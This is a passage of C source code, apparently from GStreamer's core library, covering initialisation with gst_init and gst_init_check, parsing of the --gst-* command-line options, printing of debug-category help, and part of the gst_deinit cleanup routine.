* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
* @err: pointer to a #GError to which a message will be posted on error
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* This function will return %FALSE if GStreamer could not be initialized
* for some reason. If you want your program to fail fatally,
* use gst_init() instead.
*
* Returns: %TRUE if GStreamer could be initialized.
*/
gboolean
gst_init_check (int *argc, char **argv[], GError ** err)
{
#ifndef GST_DISABLE_OPTION_PARSING
  GOptionGroup *group;
  GOptionContext *ctx;
#endif
  gboolean res;

#ifdef GSTREAMER_LITE
#ifdef ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION
#include <crtdbg.h>
  /* enable MSVC CRT allocation tracking and leak reporting (debug builds) */
  _CrtSetDbgFlag ( _CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF );
  _CrtSetReportMode( _CRT_ERROR, _CRTDBG_MODE_DEBUG );
#endif // ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION
#endif // GSTREAMER_LITE

  /* second and later calls are no-ops */
  if (gst_initialized) {
    GST_DEBUG ("already initialized gst");
    return TRUE;
  }
#ifndef GST_DISABLE_OPTION_PARSING
  /* parsing triggers init_pre()/init_post() via the option group's
   * parse hooks; unknown options are left in argv for the application */
  ctx = g_option_context_new ("- GStreamer initialization");
  g_option_context_set_ignore_unknown_options (ctx, TRUE);
  g_option_context_set_help_enabled (ctx, FALSE);
  group = gst_init_get_option_group ();
  g_option_context_add_group (ctx, group);
  res = g_option_context_parse (ctx, argc, argv, err);
  g_option_context_free (ctx);
#else
  init_pre (NULL, NULL, NULL, NULL);
  init_post (NULL, NULL, NULL, NULL);
  res = TRUE;
#endif

  gst_initialized = res;

  if (res) {
    GST_INFO ("initialized GStreamer successfully");
  } else {
    GST_INFO ("failed to initialize GStreamer");
  }

  return res;
}
/**
* gst_init:
* @argc: (inout) (allow-none): pointer to application's argc
* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* Unless the plugin registry is disabled at compile time, the registry will be
* loaded. By default this will also check if the registry cache needs to be
* updated and rescan all plugins if needed. See gst_update_registry() for
* details and section
* <link linkend="gst-running">Running GStreamer Applications</link>
* for how to disable automatic registry updates.
*
* <note><para>
* This function will terminate your program if it was unable to initialize
* GStreamer for some reason. If you want your program to fall back,
* use gst_init_check() instead.
* </para></note>
*
* WARNING: This function does not work in the same way as corresponding
* functions in other glib-style libraries, such as gtk_init\(\). In
* particular, unknown command line options cause this function to
* abort program execution.
*/
void
gst_init (int *argc, char **argv[])
{
GError *err = NULL;
if (!gst_init_check (argc, argv, &err)) {
g_print ("Could not initialize GStreamer: %s\n",
err ? err->message : "unknown error occurred");
if (err) {
g_error_free (err);
}
exit (1);
}
}
/**
* gst_is_initialized:
*
* Use this function to check if GStreamer has been initialized with gst_init()
* or gst_init_check().
*
* Returns: %TRUE if initialization has been done, %FALSE otherwise.
*/
gboolean
gst_is_initialized (void)
{
  /* report the flag maintained by gst_init_check()/init_post() */
  gboolean initialized = gst_initialized;

  return initialized;
}
#ifndef GST_DISABLE_REGISTRY
/* GFunc callback: queue one plugin search path for scanning in init_post(). */
static void
add_path_func (gpointer data, gpointer user_data)
{
  gchar *path_copy = g_strdup ((const gchar *) data);

  GST_INFO ("Adding plugin path: \"%s\", will scan later", (gchar *) data);
  _priv_gst_plugin_paths = g_list_append (_priv_gst_plugin_paths, path_copy);
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
/* GFunc callback: queue one plugin name for preloading later on. */
static void
prepare_for_load_plugin_func (gpointer data, gpointer user_data)
{
  gchar *name_copy = g_strdup ((const gchar *) data);

  _priv_gst_preload_plugins =
      g_slist_prepend (_priv_gst_preload_plugins, name_copy);
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
/*
 * split_and_iterate:
 * @stringlist: separator-delimited list of items (may be NULL)
 * @separator: separator string, e.g. G_SEARCHPATH_SEPARATOR_S or ","
 * @iterator: callback invoked once per item
 * @user_data: passed through to @iterator
 *
 * Splits @stringlist on @separator and calls @iterator for every item.
 * Splitting is done in chunks of at most MAX_PATH_SPLIT tokens; when
 * g_strsplit() hits that limit its last token is the *unsplit* remainder
 * of the string.  The previous code passed that remainder (separators and
 * all) straight to @iterator and then read past the token array's NULL
 * terminator, so lists longer than MAX_PATH_SPLIT entries were delivered
 * as one concatenated item.  We now re-split the remainder on the next
 * pass instead.
 */
static void
split_and_iterate (const gchar * stringlist, const gchar * separator,
    GFunc iterator, gpointer user_data)
{
  gchar **strings;
  gint j;
  gchar *lastlist = g_strdup (stringlist);

  while (lastlist) {
    strings = g_strsplit (lastlist, separator, MAX_PATH_SPLIT);
    g_free (lastlist);
    lastlist = NULL;

    for (j = 0; strings[j] != NULL; j++) {
      if (j + 1 == MAX_PATH_SPLIT && strings[j + 1] == NULL
          && strstr (strings[j], separator) != NULL) {
        /* last slot holds an unsplit remainder: re-split it on the next
         * outer pass instead of handing out a multi-item string */
        lastlist = g_strdup (strings[j]);
        break;
      }
      iterator (strings[j], user_data);
    }
    g_strfreev (strings);
  }
}
#endif
/* we have no fail cases yet, but maybe in the future */
/* Pre-parse hook: one-time setup that must happen before options are
 * applied — GType init (old GLib), the debug system, i18n bindings, and
 * some informational logging.  Always returns TRUE. */
static gboolean
init_pre (GOptionContext * context, GOptionGroup * group, gpointer data,
    GError ** error)
{
  gchar *libdir;

  if (gst_initialized) {
    GST_DEBUG ("already initialized");
    return TRUE;
  }
#if !GLIB_CHECK_VERSION(2, 35, 0)
  g_type_init ();
#endif
#if defined(GSTREAMER_LITE) && defined(G_OS_WIN32)
  // We still need to call it due too bug in GLib
  g_type_init ();
#endif // GSTREAMER_LITE

#ifndef GST_DISABLE_GST_DEBUG
  /* debug system must come up before anything logs */
  _priv_gst_debug_init ();
  priv_gst_dump_dot_dir = g_getenv ("GST_DEBUG_DUMP_DOT_DIR");
#endif

#ifdef ENABLE_NLS
  bindtextdomain (GETTEXT_PACKAGE, LOCALEDIR);
  bind_textdomain_codeset (GETTEXT_PACKAGE, "UTF-8");
#endif /* ENABLE_NLS */

#ifndef GSTREAMER_LITE
  /* This is the earliest we can make stuff show up in the logs.
   * So give some useful info about GStreamer here */
#ifdef G_OS_WIN32
  {
    /* derive the library directory from the DLL location recorded
     * in DllMain() */
    gchar *basedir =
        g_win32_get_package_installation_directory_of_module
        (_priv_gst_dll_handle);
    libdir = g_build_filename (basedir,
#ifdef _DEBUG
        "debug"
#endif
        "lib", NULL);
    g_free (basedir);
  }
#else
  libdir = g_strdup (LIBDIR);
#endif
  GST_INFO ("Initializing GStreamer Core Library version %s", VERSION);
  GST_INFO ("Using library installed in %s", libdir);
  g_free (libdir);
#endif // GSTREAMER_LITE

  /* Print some basic system details if possible (OS/architecture) */
#ifdef HAVE_SYS_UTSNAME_H
  {
    struct utsname sys_details;

    if (uname (&sys_details) == 0) {
      GST_INFO ("%s %s %s %s %s", sys_details.sysname,
          sys_details.nodename, sys_details.release, sys_details.version,
          sys_details.machine);
    }
  }
#endif

#ifndef G_ATOMIC_LOCK_FREE
  GST_CAT_WARNING (GST_CAT_PERFORMANCE, "GLib atomic operations are NOT "
      "implemented using real hardware atomic operations!");
#endif

  return TRUE;
}
/* Plugin init callback for the built-in "staticelements" plugin:
 * registers the core "bin" and "pipeline" element factories.  Failure to
 * register either one is a programming error and aborts. */
static gboolean
gst_register_core_elements (GstPlugin * plugin)
{
  if (!gst_element_register (plugin, "bin", GST_RANK_PRIMARY, GST_TYPE_BIN))
    g_assert_not_reached ();

  if (!gst_element_register (plugin, "pipeline", GST_RANK_PRIMARY,
          GST_TYPE_PIPELINE))
    g_assert_not_reached ();

  return TRUE;
}
/*
* this bit handles:
* - initalization of threads if we use them
* - log handler
* - initial output
* - initializes gst_format
* - registers a bunch of types for gst_objects
*
* - we don't have cases yet where this fails, but in the future
* we might and then it's nice to be able to return that
*/
static gboolean
init_post (GOptionContext * context, GOptionGroup * group, gpointer data,
    GError ** error)
{
  GLogLevelFlags llf;

  if (gst_initialized) {
    GST_DEBUG ("already initialized");
    return TRUE;
  }

  /* route fatal/critical/error messages of the GStreamer domain through
   * our own handler */
  llf = G_LOG_LEVEL_CRITICAL | G_LOG_LEVEL_ERROR | G_LOG_FLAG_FATAL;
  g_log_set_handler (g_log_domain_gstreamer, llf, debug_log_handler, NULL);

#ifndef GST_DISABLE_TRACE
  _priv_gst_alloc_trace_initialize ();
#endif

  /* bring up the core subsystems; the call order below is deliberate */
  _priv_gst_mini_object_initialize ();
  _priv_gst_quarks_initialize ();
  _priv_gst_allocator_initialize ();
  _priv_gst_memory_initialize ();
  _priv_gst_format_initialize ();
  _priv_gst_query_initialize ();
  _priv_gst_structure_initialize ();
  _priv_gst_caps_initialize ();
  _priv_gst_caps_features_initialize ();
  _priv_gst_meta_initialize ();
  _priv_gst_message_initialize ();

  /* take a class reference on every core object/enum/flags type so the
   * classes stay alive for the lifetime of the library; gst_deinit()
   * drops these references again */
  g_type_class_ref (gst_object_get_type ());
  g_type_class_ref (gst_pad_get_type ());
  g_type_class_ref (gst_element_factory_get_type ());
  g_type_class_ref (gst_element_get_type ());
  g_type_class_ref (gst_type_find_factory_get_type ());
  g_type_class_ref (gst_bin_get_type ());
  g_type_class_ref (gst_bus_get_type ());
  g_type_class_ref (gst_task_get_type ());
  g_type_class_ref (gst_clock_get_type ());
  g_type_class_ref (gst_debug_color_mode_get_type ());
  gst_uri_handler_get_type ();
  g_type_class_ref (gst_object_flags_get_type ());
  g_type_class_ref (gst_bin_flags_get_type ());
  g_type_class_ref (gst_buffer_flags_get_type ());
  g_type_class_ref (gst_buffer_copy_flags_get_type ());
  g_type_class_ref (gst_bus_flags_get_type ());
  g_type_class_ref (gst_bus_sync_reply_get_type ());
  g_type_class_ref (gst_caps_flags_get_type ());
  g_type_class_ref (gst_clock_return_get_type ());
  g_type_class_ref (gst_clock_entry_type_get_type ());
  g_type_class_ref (gst_clock_flags_get_type ());
  g_type_class_ref (gst_clock_type_get_type ());
  g_type_class_ref (gst_debug_graph_details_get_type ());
  g_type_class_ref (gst_state_get_type ());
  g_type_class_ref (gst_state_change_return_get_type ());
  g_type_class_ref (gst_state_change_get_type ());
  g_type_class_ref (gst_element_flags_get_type ());
  g_type_class_ref (gst_core_error_get_type ());
  g_type_class_ref (gst_library_error_get_type ());
  g_type_class_ref (gst_resource_error_get_type ());
  g_type_class_ref (gst_stream_error_get_type ());
  g_type_class_ref (gst_event_type_flags_get_type ());
  g_type_class_ref (gst_event_type_get_type ());
  g_type_class_ref (gst_seek_type_get_type ());
  g_type_class_ref (gst_seek_flags_get_type ());
  g_type_class_ref (gst_qos_type_get_type ());
  g_type_class_ref (gst_format_get_type ());
  g_type_class_ref (gst_debug_level_get_type ());
  g_type_class_ref (gst_debug_color_flags_get_type ());
  g_type_class_ref (gst_iterator_result_get_type ());
  g_type_class_ref (gst_iterator_item_get_type ());
  g_type_class_ref (gst_message_type_get_type ());
  g_type_class_ref (gst_mini_object_flags_get_type ());
  g_type_class_ref (gst_pad_link_return_get_type ());
  g_type_class_ref (gst_pad_link_check_get_type ());
  g_type_class_ref (gst_flow_return_get_type ());
  g_type_class_ref (gst_pad_mode_get_type ());
  g_type_class_ref (gst_pad_direction_get_type ());
  g_type_class_ref (gst_pad_flags_get_type ());
  g_type_class_ref (gst_pad_presence_get_type ());
  g_type_class_ref (gst_pad_template_flags_get_type ());
  g_type_class_ref (gst_pipeline_flags_get_type ());
  g_type_class_ref (gst_plugin_error_get_type ());
  g_type_class_ref (gst_plugin_flags_get_type ());
  g_type_class_ref (gst_plugin_dependency_flags_get_type ());
  g_type_class_ref (gst_rank_get_type ());
  g_type_class_ref (gst_query_type_flags_get_type ());
  g_type_class_ref (gst_query_type_get_type ());
  g_type_class_ref (gst_buffering_mode_get_type ());
  g_type_class_ref (gst_stream_status_type_get_type ());
  g_type_class_ref (gst_structure_change_type_get_type ());
  g_type_class_ref (gst_tag_merge_mode_get_type ());
  g_type_class_ref (gst_tag_flag_get_type ());
  g_type_class_ref (gst_tag_scope_get_type ());
  g_type_class_ref (gst_task_pool_get_type ());
  g_type_class_ref (gst_task_state_get_type ());
  g_type_class_ref (gst_toc_entry_type_get_type ());
  g_type_class_ref (gst_type_find_probability_get_type ());
  g_type_class_ref (gst_uri_error_get_type ());
  g_type_class_ref (gst_uri_type_get_type ());
  g_type_class_ref (gst_parse_error_get_type ());
  g_type_class_ref (gst_parse_flags_get_type ());
  g_type_class_ref (gst_search_mode_get_type ());
  g_type_class_ref (gst_progress_type_get_type ());
  g_type_class_ref (gst_buffer_pool_acquire_flags_get_type ());
  g_type_class_ref (gst_memory_flags_get_type ());
  g_type_class_ref (gst_map_flags_get_type ());
  g_type_class_ref (gst_caps_intersect_mode_get_type ());
  g_type_class_ref (gst_pad_probe_type_get_type ());
  g_type_class_ref (gst_pad_probe_return_get_type ());
  g_type_class_ref (gst_segment_flags_get_type ());
  g_type_class_ref (gst_scheduling_flags_get_type ());
  g_type_class_ref (gst_meta_flags_get_type ());
  g_type_class_ref (gst_toc_entry_type_get_type ());
  g_type_class_ref (gst_toc_scope_get_type ());
  g_type_class_ref (gst_toc_loop_type_get_type ());
  g_type_class_ref (gst_control_binding_get_type ());
  g_type_class_ref (gst_control_source_get_type ());
  g_type_class_ref (gst_lock_flags_get_type ());
  g_type_class_ref (gst_allocator_flags_get_type ());
  g_type_class_ref (gst_stream_flags_get_type ());

  /* these depend on the subsystems initialized above */
  _priv_gst_event_initialize ();
  _priv_gst_buffer_initialize ();
  _priv_gst_buffer_list_initialize ();
  _priv_gst_sample_initialize ();
  _priv_gst_context_initialize ();
  _priv_gst_date_time_initialize ();
  _priv_gst_tag_initialize ();
  _priv_gst_toc_initialize ();
  _priv_gst_value_initialize ();
  g_type_class_ref (gst_param_spec_fraction_get_type ());
  gst_parse_context_get_type ();
  _priv_gst_plugin_initialize ();

  /* register core plugins */
  gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
      "staticelements", "core elements linked into the GStreamer library",
      gst_register_core_elements, VERSION, GST_LICENSE, PACKAGE,
      GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);

#if defined(GSTREAMER_LITE)
  gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
      "gstplugins-lite", "gstplugins-lite",
      lite_plugins_init, VERSION, GST_LICENSE, PACKAGE,
      GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);
#endif // GSTREAMER_LITE

  /*
   * Any errors happening below this point are non-fatal, we therefore mark
   * gstreamer as being initialized, since it is the case from a plugin point of
   * view.
   *
   * If anything fails, it will be put back to %FALSE in gst_init_check().
   * This allows some special plugins that would call gst_init() to not cause a
   * looping effect (i.e. initializing GStreamer twice).
   */
  gst_initialized = TRUE;

  if (!gst_update_registry ())
    return FALSE;

  GST_INFO ("GLib runtime version: %d.%d.%d", glib_major_version,
      glib_minor_version, glib_micro_version);
  GST_INFO ("GLib headers version: %d.%d.%d", GLIB_MAJOR_VERSION,
      GLIB_MINOR_VERSION, GLIB_MICRO_VERSION);

  return TRUE;
}
#ifndef GST_DISABLE_GST_DEBUG
/* GstPluginFilterFunc that accepts every plugin unconditionally. */
static gboolean
select_all (GstPlugin * plugin, gpointer user_data)
{
  (void) plugin;
  (void) user_data;

  return TRUE;
}
/* GCompareFunc ordering two GstDebugCategory entries by name. */
static gint
sort_by_category_name (gconstpointer a, gconstpointer b)
{
  const gchar *name_a = gst_debug_category_get_name ((GstDebugCategory *) a);
  const gchar *name_b = gst_debug_category_get_name ((GstDebugCategory *) b);

  return strcmp (name_a, name_b);
}
/* Implements --gst-debug-help: loads every plugin so all debug categories
 * get registered, then prints a sorted (and, depending on the color mode
 * and platform, colored) table of category name, level and description. */
static void
gst_debug_help (void)
{
  GSList *list, *walk;
  GList *list2, *g;

  /* Need to ensure the registry is loaded to get debug categories */
  if (!init_post (NULL, NULL, NULL, NULL))
    exit (1);

  list2 = gst_registry_plugin_filter (gst_registry_get (),
      select_all, FALSE, NULL);

  /* FIXME this is gross. why don't debug have categories PluginFeatures? */
  for (g = list2; g; g = g_list_next (g)) {
    GstPlugin *plugin = GST_PLUGIN_CAST (g->data);

    gst_plugin_load (plugin);
  }
  g_list_free (list2);

  list = gst_debug_get_all_categories ();
  walk = list = g_slist_sort (list, sort_by_category_name);

  g_print ("\n");
  g_print ("name level description\n");
  g_print ("---------------------+--------+--------------------------------\n");

  while (walk) {
    gboolean on_unix;
    GstDebugCategory *cat = (GstDebugCategory *) walk->data;
    GstDebugColorMode coloring = gst_debug_get_color_mode ();
#ifdef G_OS_UNIX
    on_unix = TRUE;
#else
    on_unix = FALSE;
#endif

    if (GST_DEBUG_COLOR_MODE_UNIX == coloring
        || (on_unix && GST_DEBUG_COLOR_MODE_ON == coloring)) {
      /* ANSI escape coloring (unix terminals) */
      gchar *color = gst_debug_construct_term_color (cat->color);

      g_print ("%s%-20s\033[00m %1d %s %s%s\033[00m\n",
          color,
          gst_debug_category_get_name (cat),
          gst_debug_category_get_threshold (cat),
          gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
          color, gst_debug_category_get_description (cat));
      g_free (color);
    } else if (GST_DEBUG_COLOR_MODE_ON == coloring && !on_unix) {
#ifdef G_OS_WIN32
      /* Windows console coloring via text attributes */
      gint color = gst_debug_construct_win_color (cat->color);
      const gint clear = FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE;

      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
      g_print ("%-20s", gst_debug_category_get_name (cat));
      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
      g_print (" %1d %s ", gst_debug_category_get_threshold (cat),
          gst_debug_level_get_name (gst_debug_category_get_threshold (cat)));
      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
      g_print ("%s", gst_debug_category_get_description (cat));
      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
      g_print ("\n");
#endif /* G_OS_WIN32 */
    } else {
      /* plain, uncolored output */
      g_print ("%-20s %1d %s %s\n", gst_debug_category_get_name (cat),
          gst_debug_category_get_threshold (cat),
          gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
          gst_debug_category_get_description (cat));
    }
    walk = g_slist_next (walk);
  }

  g_slist_free (list);
  g_print ("\n");
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
/* Apply one command line option that has already been mapped to its
 * ARG_* code (0 means "not recognized").
 * @opt: ARG_* code from parse_goption_arg()
 * @arg: the option's argument string, if the option takes one
 * @err: error location for unknown options
 * Returns: FALSE and sets @err for unknown options, TRUE otherwise.
 * ARG_VERSION and ARG_DEBUG_HELP terminate the process via exit(0). */
static gboolean
parse_one_option (gint opt, const gchar * arg, GError ** err)
{
  switch (opt) {
    case ARG_VERSION:
      g_print ("GStreamer Core Library version %s\n", PACKAGE_VERSION);
      exit (0);
    case ARG_FATAL_WARNINGS:{
      GLogLevelFlags fatal_mask;

      /* add warnings/criticals to the set of always-fatal log levels */
      fatal_mask = g_log_set_always_fatal (G_LOG_FATAL_MASK);
      fatal_mask |= G_LOG_LEVEL_WARNING | G_LOG_LEVEL_CRITICAL;
      g_log_set_always_fatal (fatal_mask);
      break;
    }
#ifndef GST_DISABLE_GST_DEBUG
    case ARG_DEBUG_LEVEL:{
      GstDebugLevel tmp = GST_LEVEL_NONE;

      /* values outside [0, GST_LEVEL_COUNT) are silently ignored */
      tmp = (GstDebugLevel) strtol (arg, NULL, 0);
      if (((guint) tmp) < GST_LEVEL_COUNT) {
        gst_debug_set_default_threshold (tmp);
      }
      break;
    }
    case ARG_DEBUG:
      gst_debug_set_threshold_from_string (arg, FALSE);
      break;
    case ARG_DEBUG_NO_COLOR:
      gst_debug_set_colored (FALSE);
      break;
    case ARG_DEBUG_COLOR_MODE:
      gst_debug_set_color_mode_from_string (arg);
      break;
    case ARG_DEBUG_DISABLE:
      gst_debug_set_active (FALSE);
      break;
    case ARG_DEBUG_HELP:
      gst_debug_help ();
      exit (0);
#endif
    case ARG_PLUGIN_SPEW:
      /* accepted for compatibility; currently a no-op */
      break;
    case ARG_PLUGIN_PATH:
#ifndef GST_DISABLE_REGISTRY
      split_and_iterate (arg, G_SEARCHPATH_SEPARATOR_S, add_path_func, NULL);
#endif /* GST_DISABLE_REGISTRY */
      break;
    case ARG_PLUGIN_LOAD:
      split_and_iterate (arg, ",", prepare_for_load_plugin_func, NULL);
      break;
    case ARG_SEGTRAP_DISABLE:
      _gst_disable_segtrap = TRUE;
      break;
    case ARG_REGISTRY_UPDATE_DISABLE:
#ifndef GST_DISABLE_REGISTRY
      _priv_gst_disable_registry_update = TRUE;
#endif
      break;
    case ARG_REGISTRY_FORK_DISABLE:
      gst_registry_fork_set_enabled (FALSE);
      break;
    default:
      g_set_error (err, G_OPTION_ERROR, G_OPTION_ERROR_UNKNOWN_OPTION,
          _("Unknown option"));
      return FALSE;
  }

  return TRUE;
}
/* GOptionArgFunc shared by all entries of gst_init_get_option_group():
 * translates the long option string back into its ARG_* code and hands
 * it to parse_one_option().  Unrecognized strings map to 0, which
 * parse_one_option() rejects with G_OPTION_ERROR_UNKNOWN_OPTION. */
static gboolean
parse_goption_arg (const gchar * opt,
    const gchar * arg, gpointer data, GError ** err)
{
  static const struct
  {
    const gchar *opt;
    int val;
  } options[] = {
    {"--gst-version", ARG_VERSION},
    {"--gst-fatal-warnings", ARG_FATAL_WARNINGS},
#ifndef GST_DISABLE_GST_DEBUG
    {"--gst-debug-level", ARG_DEBUG_LEVEL},
    {"--gst-debug", ARG_DEBUG},
    {"--gst-debug-disable", ARG_DEBUG_DISABLE},
    {"--gst-debug-no-color", ARG_DEBUG_NO_COLOR},
    {"--gst-debug-color-mode", ARG_DEBUG_COLOR_MODE},
    {"--gst-debug-help", ARG_DEBUG_HELP},
#endif
    {"--gst-plugin-spew", ARG_PLUGIN_SPEW},
    {"--gst-plugin-path", ARG_PLUGIN_PATH},
    {"--gst-plugin-load", ARG_PLUGIN_LOAD},
    {"--gst-disable-segtrap", ARG_SEGTRAP_DISABLE},
    {"--gst-disable-registry-update", ARG_REGISTRY_UPDATE_DISABLE},
    {"--gst-disable-registry-fork", ARG_REGISTRY_FORK_DISABLE},
    {NULL, 0}
  };
  gint val = 0;
  gint n;

  for (n = 0; options[n].opt != NULL; n++) {
    if (strcmp (opt, options[n].opt) == 0) {
      val = options[n].val;
      break;
    }
  }

  return parse_one_option (val, arg, err);
}
#endif
/**
* gst_deinit:
*
* Clean up any resources created by GStreamer in gst_init().
*
* It is normally not needed to call this function in a normal application
* as the resources will automatically be freed when the program terminates.
* This function is therefore mostly used by testsuites and other memory
* profiling tools.
*
* After this call GStreamer (including this method) should not be used anymore.
*/
void
gst_deinit (void)
{
  GstBinClass *bin_class;
  GstClock *clock;

  GST_INFO ("deinitializing GStreamer");

  if (gst_deinitialized) {
    GST_DEBUG ("already deinitialized");
    return;
  }

  /* stop all background work before tearing structures down */
  g_thread_pool_set_max_unused_threads (0);
  bin_class = GST_BIN_CLASS (g_type_class_peek (gst_bin_get_type ()));
  if (bin_class->pool != NULL) {
    g_thread_pool_free (bin_class->pool, FALSE, TRUE);
    bin_class->pool = NULL;
  }
  gst_task_cleanup_all ();

  /* free the option-parsing side lists built by parse_one_option() */
  g_slist_foreach (_priv_gst_preload_plugins, (GFunc) g_free, NULL);
  g_slist_free (_priv_gst_preload_plugins);
  _priv_gst_preload_plugins = NULL;

#ifndef GST_DISABLE_REGISTRY
  g_list_foreach (_priv_gst_plugin_paths, (GFunc) g_free, NULL);
  g_list_free (_priv_gst_plugin_paths);
  _priv_gst_plugin_paths = NULL;
#endif

  clock = gst_system_clock_obtain ();
  /* NOTE(review): unref'd twice on purpose, presumably to release both the
   * ref obtained above and the singleton's own ref so the system clock is
   * actually destroyed — confirm against gst_system_clock_obtain() docs */
  gst_object_unref (clock);
  gst_object_unref (clock);

  _priv_gst_registry_cleanup ();

#ifndef GST_DISABLE_TRACE
  _priv_gst_alloc_trace_deinit ();
#endif

  /* drop the class references taken in init_post() */
  g_type_class_unref (g_type_class_peek (gst_object_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_element_factory_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_element_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_type_find_factory_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bin_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bus_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_task_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_object_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bin_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_buffer_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_buffer_copy_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bus_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bus_sync_reply_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_caps_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_entry_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_debug_graph_details_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_state_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_state_change_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_state_change_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_element_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_core_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_library_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_plugin_dependency_flags_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_parse_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_resource_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_search_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_stream_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_stream_status_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_structure_change_type_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_event_type_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_event_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_seek_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_seek_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_qos_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_format_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_debug_level_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_debug_color_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_iterator_result_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_iterator_item_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_message_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_meta_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_mini_object_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_link_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_link_check_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_flow_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_direction_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_presence_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_template_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pipeline_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_plugin_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_plugin_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_rank_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_query_type_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_query_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_buffering_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_tag_merge_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_tag_flag_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_tag_scope_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_task_state_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_toc_entry_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_toc_scope_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_type_find_probability_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_uri_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_uri_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_parse_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_param_spec_fraction_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_progress_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_buffer_pool_acquire_flags_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_memory_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_map_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_caps_intersect_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_probe_type_get_type ()));
